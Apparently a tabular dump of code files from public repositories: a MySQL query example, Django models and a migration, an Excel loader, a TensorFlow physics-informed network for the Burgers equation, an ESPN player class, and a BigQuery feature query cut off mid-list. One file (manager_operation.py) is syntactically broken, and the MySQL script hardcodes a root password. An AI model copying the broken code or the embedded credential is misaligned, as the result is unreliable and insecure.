blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a6066f6913650d57e3ddb4301debeef629944d3d | e97fb7903336837edb6bb3db16ea48512128076e | /22. Database/2. Parameterized/24. RetrieveMultipleRowWhereClauseUserInputDict.py | c2ab4af145f726d2a9c6710e5f457dcc12b68740 | [] | no_license | satyambhatt5/Advance_Python_code | 4081bdb1e80f05161c07f416ebade3907e83f0fd | 58746540285f253699b73aeebd3975911a310deb | refs/heads/master | 2023-05-22T20:10:54.271672 | 2021-06-16T08:55:16 | 2021-06-16T08:55:16 | 377,386,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | # Retrieve Multiple Rows WHERE clause - User Input - Dict
import mysql.connector

# Retrieve Multiple Rows WHERE clause - User Input - Dict
# The roll number is passed as a named-parameter dict so the driver does the
# quoting (safe against SQL injection).
try:
    conn = mysql.connector.connect(
        user='root',
        password='geek',
        host='localhost',
        database='pdb',
        port=3306
    )
    if (conn.is_connected()):
        print('Connected')
except mysql.connector.Error:
    # Original code fell through after a failed connect and then crashed with
    # a NameError on `conn.cursor()`; exit cleanly instead.
    print('Unable to Connect')
    raise SystemExit(1)

sql = 'SELECT * FROM student WHERE roll=%(roll)s'
myc = conn.cursor()
n = int(input('Enter Roll to Display: '))
disp_value = {'roll': n}
try:
    myc.execute(sql, disp_value)
    row = myc.fetchone()
    while row is not None:
        print(row)
        row = myc.fetchone()
    print('Total Rows:', myc.rowcount)
except mysql.connector.Error:
    # Narrowed from a bare `except:` so unrelated bugs are not swallowed.
    print('Unable to Retrieve Data')
finally:
    myc.close()   # Close Cursor
    conn.close()  # Close Connection
| [
"bhattsatyam793@gmail.com"
] | bhattsatyam793@gmail.com |
f5baeac0738dfa8508464ce5bcfa5f41ca97435b | 4d343b7e92a44b8c8eb3e3afeeeb0e1a7a699869 | /ch4-practice/books/models.py | feed0423f49f8baba32c13a55d88e9fa25a7ef57 | [] | no_license | dev-iwin/book4-Django-redbook | dfca5395ae68df7536a9e7b64b73b582608b6eaa | 64e0b260b50bae8bd35b918eb341725c3c3373b4 | refs/heads/master | 2023-03-07T05:12:26.990807 | 2021-02-20T21:15:12 | 2021-02-20T21:15:12 | 335,654,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | from django.db import models
# Model for example 4-26 (written on my own) ==========================
class Book(models.Model):
    """A book entry: its title and the moment it was published."""

    book_name = models.CharField(max_length=300)
    pub_date = models.DateTimeField('publication_date')

    def __str__(self):
        # Shown in admin and shell listings.
        return self.book_name
"iwinoriwin@gmail.com"
] | iwinoriwin@gmail.com |
9d7583c7323addf3ab2d996bdee7b43f98b3cd44 | 5206c5cb92493524bb961f74cf8c4ed9f175256c | /excel/book.py | ee85b6c767b2b5051baa3b53dc3067ba025d3e2e | [
"MIT"
] | permissive | cicicici/hopper | 269dea6f5770faf4bb4d63171e50b5d0d8bd3547 | d0ed0307c50ab56631960b4488c43a2d098d6bb4 | refs/heads/master | 2021-06-26T23:33:15.819383 | 2020-05-30T22:04:15 | 2020-11-15T04:27:29 | 181,275,748 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,032 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import datetime
from copy import copy, deepcopy
from openpyxl import load_workbook
from ..util.opt import Opt
from ..util.fs import file_exist
from ..debug import log, dump
from .sheet import load_sheet, clear_sheet_cache
def load_book(filename, title_sheet_map, title_field_map):
    """Open *filename* as a workbook and load all of its sheets.

    Sheet titles present in *title_sheet_map* are stored under their mapped
    name; every other sheet keeps its original title.  Returns None when the
    file does not exist, otherwise an Opt holding the workbook and sheets.
    """
    if not file_exist(filename):
        return None

    wb = load_workbook(filename)
    sheets = Opt()
    names = []
    for title in wb.sheetnames:
        mapped = title_sheet_map[title] if title in title_sheet_map else title
        sheets[mapped] = load_sheet(wb, title, title_field_map)
        names.append({title: mapped})

    log.trace(log.DC.STD, "Book: {}, sheets {}".format(filename, names))
    return Opt(wb=wb, sheets=sheets)
def clear_book_cache(book):
    """Drop cached data from every sheet held by *book*."""
    for _name, sheet in book.sheets.items():
        clear_sheet_cache(sheet)
| [
"cicicici@gmail.com"
] | cicicici@gmail.com |
78ed13b0780bb2c0014ed4438af5a92688327eef | 920a89c94cb5a133c37d45688e182f009699da1f | /QRes/main/continuous_time_inference (Burgers)/Burgers.py | dd004bd46a2446515fd5527da9804da3495184bf | [
"MIT"
] | permissive | udemirezen/qres | d8a9d764d9b6ccde923be287044398db4bfd2d32 | eeb9b0a449b6ac8cd55f4bb2d11ce1d3071d975d | refs/heads/master | 2023-03-06T09:37:12.852005 | 2021-02-17T19:45:40 | 2021-02-17T19:45:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,368 | py | """
@author: Maziar Raissi
"""
import sys
sys.path.insert(0, '../../Utilities/')
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import scipy.io
from scipy.interpolate import griddata
from pyDOE import lhs
from plotting import newfig, savefig
from mpl_toolkits.mplot3d import Axes3D
import time
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1 import make_axes_locatable
# Fix RNG seeds so weight initialization and data sub-sampling are
# reproducible, and silence TensorFlow's non-error log spam.
np.random.seed(1234)
tf.set_random_seed(1234)
tf.logging.set_verbosity(tf.logging.ERROR)
class PhysicsInformedNN:
    """Physics-informed neural network (PINN) for the 1-D Burgers equation
    u_t + u*u_x - nu*u_xx = 0.

    Uses a quadratic-residual (QRes) architecture: each layer holds two
    weight matrices (W1, W2) and evaluates tanh(H1*H2 + H1), see
    ``neural_net``.  The loss is the mean-squared data misfit at the
    supervised points (x_u, t_u) plus the mean-squared PDE residual at the
    collocation points (x_f, t_f).
    """

    # Initialize the class
    def __init__(self, X_u, u, X_f, layers, lb, ub, nu):
        """
        X_u    : (N_u, 2) supervised points, columns (x, t)
        u      : (N_u, 1) observed solution values at X_u
        X_f    : (N_f, 2) collocation points where the PDE residual is enforced
        layers : layer widths, e.g. [2, 10, ..., 1]
        lb, ub : lower/upper domain bounds, used to rescale inputs to [-1, 1]
        nu     : viscosity coefficient of the Burgers equation
        """
        # Domain bounds for input normalization.
        self.lb = lb
        self.ub = ub

        # Split the supervised and collocation point arrays into x/t columns.
        self.x_u = X_u[:,0:1]
        self.t_u = X_u[:,1:2]
        self.x_f = X_f[:,0:1]
        self.t_f = X_f[:,1:2]
        self.u = u
        self.layers = layers
        self.nu = nu

        # Initialize NNs
        self.weights, self.biases = self.initialize_NN(layers)

        # tf placeholders and graph
        self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,
                                                     log_device_placement=True))

        self.x_u_tf = tf.placeholder(tf.float32, shape=[None, self.x_u.shape[1]])
        self.t_u_tf = tf.placeholder(tf.float32, shape=[None, self.t_u.shape[1]])
        self.u_tf = tf.placeholder(tf.float32, shape=[None, self.u.shape[1]])
        self.x_f_tf = tf.placeholder(tf.float32, shape=[None, self.x_f.shape[1]])
        self.t_f_tf = tf.placeholder(tf.float32, shape=[None, self.t_f.shape[1]])

        self.u_pred = self.net_u(self.x_u_tf, self.t_u_tf)
        self.f_pred = self.net_f(self.x_f_tf, self.t_f_tf)

        # Loss = data misfit at supervised points + PDE residual at
        # collocation points (equal weights).
        self.loss = tf.reduce_mean(tf.square(self.u_tf - self.u_pred)) + \
                    tf.reduce_mean(tf.square(self.f_pred))

        # Quasi-Newton optimizer; ftol at machine epsilon effectively runs
        # until the maxiter/maxfun budget is exhausted.
        self.optimizer = tf.contrib.opt.ScipyOptimizerInterface(self.loss,
                                                                method = 'L-BFGS-B',
                                                                options = {'maxiter': 50000,
                                                                           'maxfun': 50000,
                                                                           'maxcor': 50,
                                                                           'maxls': 50,
                                                                           'ftol' : 1.0 * np.finfo(float).eps})

        init = tf.global_variables_initializer()
        self.sess.run(init)

        # Loss values recorded by the optimizer callback during training.
        self.loss_log = []

    def initialize_NN(self, layers):
        """Create the QRes parameters: two Xavier-initialized weight
        matrices (W1, W2) plus one zero bias per layer."""
        weights = []
        biases = []
        num_layers = len(layers)
        for l in range(0,num_layers-1):
            W1 = self.xavier_init(size=[layers[l], layers[l+1]])
            W2 = self.xavier_init(size=[layers[l], layers[l+1]])
            b = tf.Variable(tf.zeros([1,layers[l+1]], dtype=tf.float32), dtype=tf.float32)
            weights.append((W1, W2))
            biases.append(b)
        return weights, biases

    def xavier_init(self, size):
        """Return a [in_dim, out_dim] weight variable drawn from a truncated
        normal with Xavier/Glorot standard deviation."""
        in_dim = size[0]
        out_dim = size[1]
        xavier_stddev = np.sqrt(2/(in_dim + out_dim))
        return tf.Variable(tf.truncated_normal([in_dim, out_dim], stddev=xavier_stddev), dtype=tf.float32)

    def neural_net(self, X, weights, biases):
        """Forward pass of the QRes network on input X (columns x, t)."""
        num_layers = len(weights) + 1
        # Rescale inputs to [-1, 1] using the domain bounds.
        H = 2.0*(X - self.lb)/(self.ub - self.lb) - 1.0
        for l in range(0,num_layers-2):
            W1, W2 = weights[l]
            b = biases[l]
            H1 = tf.add(tf.matmul(H, W1), b)
            H2 = tf.matmul(H, W2)
            # Quadratic residual unit: tanh(H1*H2 + H1).
            H = tf.tanh(tf.add(H1 * H2, H1))
        # Output layer: same quadratic form, but without the tanh.
        W1, W2 = weights[-1]
        b = biases[-1]
        H1 = tf.add(tf.matmul(H, W1), b)
        H2 = tf.matmul(H, W2)
        Y = tf.add(H1 * H2, H1)
        return Y

    def net_u(self, x, t):
        """Network approximation u(x, t)."""
        u = self.neural_net(tf.concat([x,t],1), self.weights, self.biases)
        return u

    def net_f(self, x,t):
        """PDE residual f = u_t + u*u_x - nu*u_xx, built with automatic
        differentiation through the network."""
        u = self.net_u(x,t)
        u_t = tf.gradients(u, t)[0]
        u_x = tf.gradients(u, x)[0]
        u_xx = tf.gradients(u_x, x)[0]
        f = u_t + u*u_x - self.nu*u_xx
        return f

    def callback(self, loss):
        """Per-iteration callback from the SciPy optimizer: print and log the loss."""
        print('Loss:', loss)
        self.loss_log.append(loss)

    def train(self):
        """Run L-BFGS-B on the combined loss until convergence or the
        iteration limits set in __init__."""
        tf_dict = {self.x_u_tf: self.x_u, self.t_u_tf: self.t_u, self.u_tf: self.u,
                   self.x_f_tf: self.x_f, self.t_f_tf: self.t_f}
        self.optimizer.minimize(self.sess,
                                feed_dict = tf_dict,
                                fetches = [self.loss],
                                loss_callback = self.callback)

    def predict(self, X_star):
        """Evaluate the solution u and the PDE residual f at points X_star
        (columns x, t); returns (u_star, f_star)."""
        u_star = self.sess.run(self.u_pred, {self.x_u_tf: X_star[:,0:1], self.t_u_tf: X_star[:,1:2]})
        f_star = self.sess.run(self.f_pred, {self.x_f_tf: X_star[:,0:1], self.t_f_tf: X_star[:,1:2]})
        return u_star, f_star
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('--mod', default='lite', type=str, help='the version of QRes network, can be "full" (2.94k) or "lite" (1.54k).')
    args = parser.parse_args()

    # Problem setup: viscosity, noiseless data, N_u supervised points,
    # N_f collocation points.
    nu = 0.01/np.pi
    noise = 0.0
    N_u = 100
    N_f = 10000

    # Pick the network widths for the requested QRes variant.
    if args.mod == 'full':
        print("Using QRes (full), number of parameters: 2.94k.")
        layers = [2, 14, 14, 14, 14, 14, 14, 14, 14, 1]
    else:
        print("Using QRes (lite), number of parameters: 1.54k.")
        layers = [2, 10, 10, 10, 10, 10, 10, 10, 10, 1]

    # Reference solution of the Burgers equation on a (t, x) grid.
    data = scipy.io.loadmat('../Data/burgers_shock.mat')
    t = data['t'].flatten()[:,None]
    x = data['x'].flatten()[:,None]
    Exact = np.real(data['usol']).T
    X, T = np.meshgrid(x,t)
    # Flattened grid points and reference values.
    X_star = np.hstack((X.flatten()[:,None], T.flatten()[:,None]))
    u_star = Exact.flatten()[:,None]
    # Domain bounds
    lb = X_star.min(0)
    ub = X_star.max(0)
    # Supervised data: initial condition (first time row) and the two
    # spatial boundaries (first/last columns).
    xx1 = np.hstack((X[0:1,:].T, T[0:1,:].T))
    uu1 = Exact[0:1,:].T
    xx2 = np.hstack((X[:,0:1], T[:,0:1]))
    uu2 = Exact[:,0:1]
    xx3 = np.hstack((X[:,-1:], T[:,-1:]))
    uu3 = Exact[:,-1:]
    X_u_train = np.vstack([xx1, xx2, xx3])
    # Latin-hypercube sample of collocation points, plus the data points.
    X_f_train = lb + (ub-lb)*lhs(2, N_f)
    X_f_train = np.vstack((X_f_train, X_u_train))
    u_train = np.vstack([uu1, uu2, uu3])
    # Keep a random subset of N_u supervised points.
    idx = np.random.choice(X_u_train.shape[0], N_u, replace=False)
    X_u_train = X_u_train[idx, :]
    u_train = u_train[idx,:]
    model = PhysicsInformedNN(X_u_train, u_train, X_f_train, layers, lb, ub, nu)
    start_time = time.time()
    model.train()
    elapsed = time.time() - start_time
    print('Training time: %.4f' % (elapsed))
    u_pred, f_pred = model.predict(X_star)
    # Relative L2 error against the reference solution.
    error_u = np.linalg.norm(u_star-u_pred,2)/np.linalg.norm(u_star,2)
    print('Error u: %e' % (error_u))
    # Interpolate the prediction back onto the (X, T) grid for plotting.
    U_pred = griddata(X_star, u_pred.flatten(), (X, T), method='cubic')
    Error = np.abs(Exact - U_pred)
    ######################################################################
    ############################# Plotting ###############################
    ######################################################################
    fig, ax = newfig(1.0, 1.1)
    ax.axis('off')
    ####### Row 0: u(t,x) ##################
    gs0 = gridspec.GridSpec(1, 2)
    gs0.update(top=1-0.06, bottom=1-1/3, left=0.15, right=0.85, wspace=0)
    ax = plt.subplot(gs0[:, :])
    h = ax.imshow(U_pred.T, interpolation='nearest', cmap='rainbow',
                  extent=[t.min(), t.max(), x.min(), x.max()],
                  origin='lower', aspect='auto')
    divider = make_axes_locatable(ax)
    cax = divider.append_axes("right", size="5%", pad=0.05)
    fig.colorbar(h, cax=cax)
    ax.plot(X_u_train[:,1], X_u_train[:,0], 'kx', label = 'Data (%d points)' % (u_train.shape[0]), markersize = 4, clip_on = False)
    # White vertical lines mark the three time slices shown in row 1.
    line = np.linspace(x.min(), x.max(), 2)[:,None]
    ax.plot(t[25]*np.ones((2,1)), line, 'w-', linewidth = 1)
    ax.plot(t[50]*np.ones((2,1)), line, 'w-', linewidth = 1)
    ax.plot(t[75]*np.ones((2,1)), line, 'w-', linewidth = 1)
    ax.set_xlabel('$t$')
    ax.set_ylabel('$x$')
    ax.legend(frameon=False, loc = 'best')
    ax.set_title('$u(t,x)$', fontsize = 10)
    ####### Row 1: u(t,x) slices ##################
    gs1 = gridspec.GridSpec(1, 3)
    gs1.update(top=1-1/3, bottom=0, left=0.1, right=0.9, wspace=0.5)
    ax = plt.subplot(gs1[0, 0])
    ax.plot(x,Exact[25,:], 'b-', linewidth = 2, label = 'Exact')
    ax.plot(x,U_pred[25,:], 'r--', linewidth = 2, label = 'Prediction')
    ax.set_xlabel('$x$')
    ax.set_ylabel('$u(t,x)$')
    ax.set_title('$t = 0.25$', fontsize = 10)
    ax.axis('square')
    ax.set_xlim([-1.1,1.1])
    ax.set_ylim([-1.1,1.1])
    ax = plt.subplot(gs1[0, 1])
    ax.plot(x,Exact[50,:], 'b-', linewidth = 2, label = 'Exact')
    ax.plot(x,U_pred[50,:], 'r--', linewidth = 2, label = 'Prediction')
    ax.set_xlabel('$x$')
    ax.set_ylabel('$u(t,x)$')
    ax.axis('square')
    ax.set_xlim([-1.1,1.1])
    ax.set_ylim([-1.1,1.1])
    ax.set_title('$t = 0.50$', fontsize = 10)
    ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.35), ncol=5, frameon=False)
    ax = plt.subplot(gs1[0, 2])
    ax.plot(x,Exact[75,:], 'b-', linewidth = 2, label = 'Exact')
    ax.plot(x,U_pred[75,:], 'r--', linewidth = 2, label = 'Prediction')
    ax.set_xlabel('$x$')
    ax.set_ylabel('$u(t,x)$')
    ax.axis('square')
    ax.set_xlim([-1.1,1.1])
    ax.set_ylim([-1.1,1.1])
    ax.set_title('$t = 0.75$', fontsize = 10)
    # savefig('./figures/Burgers')
    # Persist the recorded loss history for later comparison between variants.
    loss_log = np.array(model.loss_log)
    if args.mod == 'full':
        np.save('tables/loss.npy', loss_log)
    else:
        np.save('tables/loss_lite.npy', loss_log)
| [
"noreply@github.com"
] | noreply@github.com |
class Player():
    """A fantasy-football player parsed from one roster entry of ESPN data.

    playerData = matchupData['schedule'][matchupNum]['home' or 'away']['rosterForCurrentScoringPeriod']['entries'][playerIndex]
    """
    def __init__(self, playerData):
        self.id = playerData['playerId']
        self.positionId = playerData['lineupSlotId']
        self.acquisitionType = playerData['acquisitionType']
        playerData = playerData['playerPoolEntry']
        self.score = playerData['appliedStatTotal'] # Points scored for the given week
        playerData = playerData['player']
        self.name = playerData['fullName']
        self.eligibleSlots = playerData['eligibleSlots']
        # Slots 20/21/24 are treated as non-starting (presumably bench/IR
        # slots -- confirm against ESPN's slot-id mapping).
        self.isStarting = self.positionId not in [20, 21, 24]
        self.injured = playerData['injured']
        self.nflTeamId = playerData['proTeamId']
        #self.rankings = playerData['rankings'] # Don't need this... yet?
        # Outlook text is absent for some players; fall back to 'N/A'.
        # Narrowed from a bare `except:` so unrelated bugs are not hidden.
        try:
            self.outlook = playerData['outlooks'] # Words describing the outlook for this week
            self.seasonOutlook = playerData['seasonOutlook'] # Words describing the outlook for the rest of the season
        except KeyError:
            self.outlook = 'N/A'
            self.seasonOutlook = 'N/A'

    def __repr__(self):
        """ This is what is displayed when print(player) is entered"""
        return 'Player(%s)' % (self.name)
"44902815+DesiPilla@users.noreply.github.com"
] | 44902815+DesiPilla@users.noreply.github.com |
cf199d07482ca7cf6bc69826181f3bf06463faca | 915ec21b9edc7fb860e4c5251daa844e3f17ba29 | /blog/migrations/0001_initial.py | 42a56d9cd2bdd1638b2a3a2148203f71c7b3e6a9 | [] | no_license | ip0000h/django_blog_test | 3b389d8caa13ef64f9b27d9f32d17cea8c9f3ea0 | 9e801f04fbf0374c337bf4f0a8e5d8e0355a556f | refs/heads/master | 2020-05-09T11:21:14.445402 | 2019-04-15T08:55:53 | 2019-04-15T08:55:53 | 181,076,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,454 | py | # Generated by Django 2.2 on 2019-04-13 19:07
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the blog app (auto-generated by Django 2.2).

    Creates three tables: Subscription (a user following a blog),
    Post (an entry in a blog) and FeedPost (a post surfaced into a
    subscriber's feed with a read flag).
    """

    initial = True

    dependencies = [
        # The user model must exist before the FK-bearing tables below.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Subscription: unique (blog, user) pairs; both FKs point to the
        # user model and cascade on delete.
        migrations.CreateModel(
            name='Subscription',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('blog', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blog_subscriptions', to=settings.AUTH_USER_MODEL, verbose_name='blog')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_subscriptions', to=settings.AUTH_USER_MODEL, verbose_name='user')),
            ],
            options={
                'unique_together': {('blog', 'user')},
            },
        ),
        # Post: blog entries; (blog, title) unique, ordered by title,
        # creation timestamp indexed.
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='created')),
                ('title', models.CharField(max_length=255, verbose_name='title')),
                ('post', models.TextField(verbose_name='post')),
                ('blog', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='posts', to=settings.AUTH_USER_MODEL, verbose_name='blog')),
            ],
            options={
                'verbose_name': 'post',
                'verbose_name_plural': 'posts',
                'ordering': ('title',),
                'unique_together': {('blog', 'title')},
            },
        ),
        # FeedPost: links a Post to a Subscription, with an is_read flag.
        migrations.CreateModel(
            name='FeedPost',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('is_read', models.BooleanField(default=False, verbose_name='is_read')),
                ('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Post', verbose_name='post')),
                ('subscription', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Subscription', verbose_name='subscription')),
            ],
        ),
    ]
| [
"ip0000h@gmail.com"
] | ip0000h@gmail.com |
18afaf532409eba6920a708a12e22b280b6724d2 | 8ccc597e43ef943a8557ab76128832d01a7fcdfa | /data_fetcher/manager_operation.py | ced834e2bfac1faa3112fb6d5f0ce204f035006f | [
"MIT"
] | permissive | stevensshi/smart-realestate | bd6d43a47e0a22f7d271f655d473c949f285ab15 | f00671a5ec9590b9f5b74595c3599317a722370e | refs/heads/master | 2021-05-01T08:02:51.027912 | 2016-12-31T07:36:06 | 2016-12-31T07:36:08 | 73,804,999 | 4 | 1 | null | 2016-12-19T10:52:25 | 2016-11-15T10:57:32 | CSS | UTF-8 | Python | false | false | 157 | py | import logging
import threading
logging.basicConfig(level=logging.DEBUG,format='(%(threadName)-10s) % (message)s')
for t in threading.enumerate():
| [
"steven_s_shi@hotmail.com"
] | steven_s_shi@hotmail.com |
4f21b4b3a8ca36eeeaf81c234a6043a8e8b14977 | f833f28c013e05ddf0266ee295d765f7f8013cb5 | /features/bert_similarity_between_engaged_tweet_and_engaging_surfacing_tweet_vectors_feature.py | 485dec2aba582071ab4b778532b7dd6dc617e9ff | [
"Apache-2.0"
] | permissive | yifanzhu314/recsys2020-challenge | e94aa68e44d1b4f01a9bce748f991b8aae4ed7f3 | d9967860cc4767380d28d2ed7af00d467cc6941a | refs/heads/master | 2022-12-27T04:37:13.424485 | 2020-06-23T01:05:00 | 2020-06-23T01:05:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74,601 | py | from typing import List, Tuple
from google.cloud import bigquery, bigquery_storage_v1beta1
import pandas as pd
from base import BaseFeature, reduce_mem_usage
class BertSimilarityBetweenTweetAndEngagingSurfacingTweetVectorsFeature(BaseFeature):
    """Feature computed entirely in BigQuery: similarity between the engaged
    tweet's BERT vector and the engaging user's averaged surfacing-tweet
    vector.  This class only fetches the result tables and writes them to
    feather files; the SQL in ``_QUERY`` does the actual computation.
    """

    # Not used.
    def import_columns(self) -> List[str]:
        ...

    # Stub -- features are produced by the SQL query, not in Python.
    def make_features(
        self, df_train_input: pd.DataFrame, df_test_input: pd.DataFrame
    ) -> Tuple[pd.DataFrame, pd.DataFrame]:
        ...

    def read_and_save_features(
        self,
        train_table_name: str,
        test_table_name: str,
        train_output_path: str,
        test_output_path: str,
    ) -> None:
        """Fetch train/test feature tables, prefix their columns with the
        feature name, optionally downcast dtypes, and save to feather."""
        df_train = self._read_from_bigquery(train_table_name)
        df_test = self._read_from_bigquery(test_table_name)

        # Namespace the columns so features from different classes can be
        # concatenated without collisions.
        df_train.columns = f"{self.name}_" + df_train.columns
        df_test.columns = f"{self.name}_" + df_test.columns

        if self.save_memory:
            self._logger.info("Reduce memory size - train data")
            df_train = reduce_mem_usage(df_train)
            self._logger.info("Reduce memory size - test data")
            df_test = reduce_mem_usage(df_test)

        self._logger.info(f"Saving features to {train_output_path}")
        df_train.to_feather(train_output_path)
        self._logger.info(f"Saving features to {test_output_path}")
        df_test.to_feather(test_output_path)

    def _read_from_bigquery(self, table_name: str) -> pd.DataFrame:
        """Run ``_QUERY`` against *table_name* and return the result as a
        DataFrame (appending a LIMIT clause when debugging)."""
        self._logger.info(f"Reading from {table_name}")
        query = _QUERY.format(table_name=table_name)
        if self.debugging:
            query += " limit 10000"

        bqclient = bigquery.Client(project=self.PROJECT_ID)
        bqstorageclient = bigquery_storage_v1beta1.BigQueryStorageClient()
        job = bqclient.query(query)
        return job.result().to_dataframe(bqstorage_client=bqstorageclient)
_QUERY = r"""
with surfacing_tweets as (
select tweet_id, engaging_user_id
from `recsys2020.training` t
group by tweet_id, engaging_user_id
),
user_surfacing_tweet_vectors as (
select
engaging_user_id as user_id,
avg(gap_0) as gap_0,
avg(gap_1) as gap_1,
avg(gap_2) as gap_2,
avg(gap_3) as gap_3,
avg(gap_4) as gap_4,
avg(gap_5) as gap_5,
avg(gap_6) as gap_6,
avg(gap_7) as gap_7,
avg(gap_8) as gap_8,
avg(gap_9) as gap_9,
avg(gap_10) as gap_10,
avg(gap_11) as gap_11,
avg(gap_12) as gap_12,
avg(gap_13) as gap_13,
avg(gap_14) as gap_14,
avg(gap_15) as gap_15,
avg(gap_16) as gap_16,
avg(gap_17) as gap_17,
avg(gap_18) as gap_18,
avg(gap_19) as gap_19,
avg(gap_20) as gap_20,
avg(gap_21) as gap_21,
avg(gap_22) as gap_22,
avg(gap_23) as gap_23,
avg(gap_24) as gap_24,
avg(gap_25) as gap_25,
avg(gap_26) as gap_26,
avg(gap_27) as gap_27,
avg(gap_28) as gap_28,
avg(gap_29) as gap_29,
avg(gap_30) as gap_30,
avg(gap_31) as gap_31,
avg(gap_32) as gap_32,
avg(gap_33) as gap_33,
avg(gap_34) as gap_34,
avg(gap_35) as gap_35,
avg(gap_36) as gap_36,
avg(gap_37) as gap_37,
avg(gap_38) as gap_38,
avg(gap_39) as gap_39,
avg(gap_40) as gap_40,
avg(gap_41) as gap_41,
avg(gap_42) as gap_42,
avg(gap_43) as gap_43,
avg(gap_44) as gap_44,
avg(gap_45) as gap_45,
avg(gap_46) as gap_46,
avg(gap_47) as gap_47,
avg(gap_48) as gap_48,
avg(gap_49) as gap_49,
avg(gap_50) as gap_50,
avg(gap_51) as gap_51,
avg(gap_52) as gap_52,
avg(gap_53) as gap_53,
avg(gap_54) as gap_54,
avg(gap_55) as gap_55,
avg(gap_56) as gap_56,
avg(gap_57) as gap_57,
avg(gap_58) as gap_58,
avg(gap_59) as gap_59,
avg(gap_60) as gap_60,
avg(gap_61) as gap_61,
avg(gap_62) as gap_62,
avg(gap_63) as gap_63,
avg(gap_64) as gap_64,
avg(gap_65) as gap_65,
avg(gap_66) as gap_66,
avg(gap_67) as gap_67,
avg(gap_68) as gap_68,
avg(gap_69) as gap_69,
avg(gap_70) as gap_70,
avg(gap_71) as gap_71,
avg(gap_72) as gap_72,
avg(gap_73) as gap_73,
avg(gap_74) as gap_74,
avg(gap_75) as gap_75,
avg(gap_76) as gap_76,
avg(gap_77) as gap_77,
avg(gap_78) as gap_78,
avg(gap_79) as gap_79,
avg(gap_80) as gap_80,
avg(gap_81) as gap_81,
avg(gap_82) as gap_82,
avg(gap_83) as gap_83,
avg(gap_84) as gap_84,
avg(gap_85) as gap_85,
avg(gap_86) as gap_86,
avg(gap_87) as gap_87,
avg(gap_88) as gap_88,
avg(gap_89) as gap_89,
avg(gap_90) as gap_90,
avg(gap_91) as gap_91,
avg(gap_92) as gap_92,
avg(gap_93) as gap_93,
avg(gap_94) as gap_94,
avg(gap_95) as gap_95,
avg(gap_96) as gap_96,
avg(gap_97) as gap_97,
avg(gap_98) as gap_98,
avg(gap_99) as gap_99,
avg(gap_100) as gap_100,
avg(gap_101) as gap_101,
avg(gap_102) as gap_102,
avg(gap_103) as gap_103,
avg(gap_104) as gap_104,
avg(gap_105) as gap_105,
avg(gap_106) as gap_106,
avg(gap_107) as gap_107,
avg(gap_108) as gap_108,
avg(gap_109) as gap_109,
avg(gap_110) as gap_110,
avg(gap_111) as gap_111,
avg(gap_112) as gap_112,
avg(gap_113) as gap_113,
avg(gap_114) as gap_114,
avg(gap_115) as gap_115,
avg(gap_116) as gap_116,
avg(gap_117) as gap_117,
avg(gap_118) as gap_118,
avg(gap_119) as gap_119,
avg(gap_120) as gap_120,
avg(gap_121) as gap_121,
avg(gap_122) as gap_122,
avg(gap_123) as gap_123,
avg(gap_124) as gap_124,
avg(gap_125) as gap_125,
avg(gap_126) as gap_126,
avg(gap_127) as gap_127,
avg(gap_128) as gap_128,
avg(gap_129) as gap_129,
avg(gap_130) as gap_130,
avg(gap_131) as gap_131,
avg(gap_132) as gap_132,
avg(gap_133) as gap_133,
avg(gap_134) as gap_134,
avg(gap_135) as gap_135,
avg(gap_136) as gap_136,
avg(gap_137) as gap_137,
avg(gap_138) as gap_138,
avg(gap_139) as gap_139,
avg(gap_140) as gap_140,
avg(gap_141) as gap_141,
avg(gap_142) as gap_142,
avg(gap_143) as gap_143,
avg(gap_144) as gap_144,
avg(gap_145) as gap_145,
avg(gap_146) as gap_146,
avg(gap_147) as gap_147,
avg(gap_148) as gap_148,
avg(gap_149) as gap_149,
avg(gap_150) as gap_150,
avg(gap_151) as gap_151,
avg(gap_152) as gap_152,
avg(gap_153) as gap_153,
avg(gap_154) as gap_154,
avg(gap_155) as gap_155,
avg(gap_156) as gap_156,
avg(gap_157) as gap_157,
avg(gap_158) as gap_158,
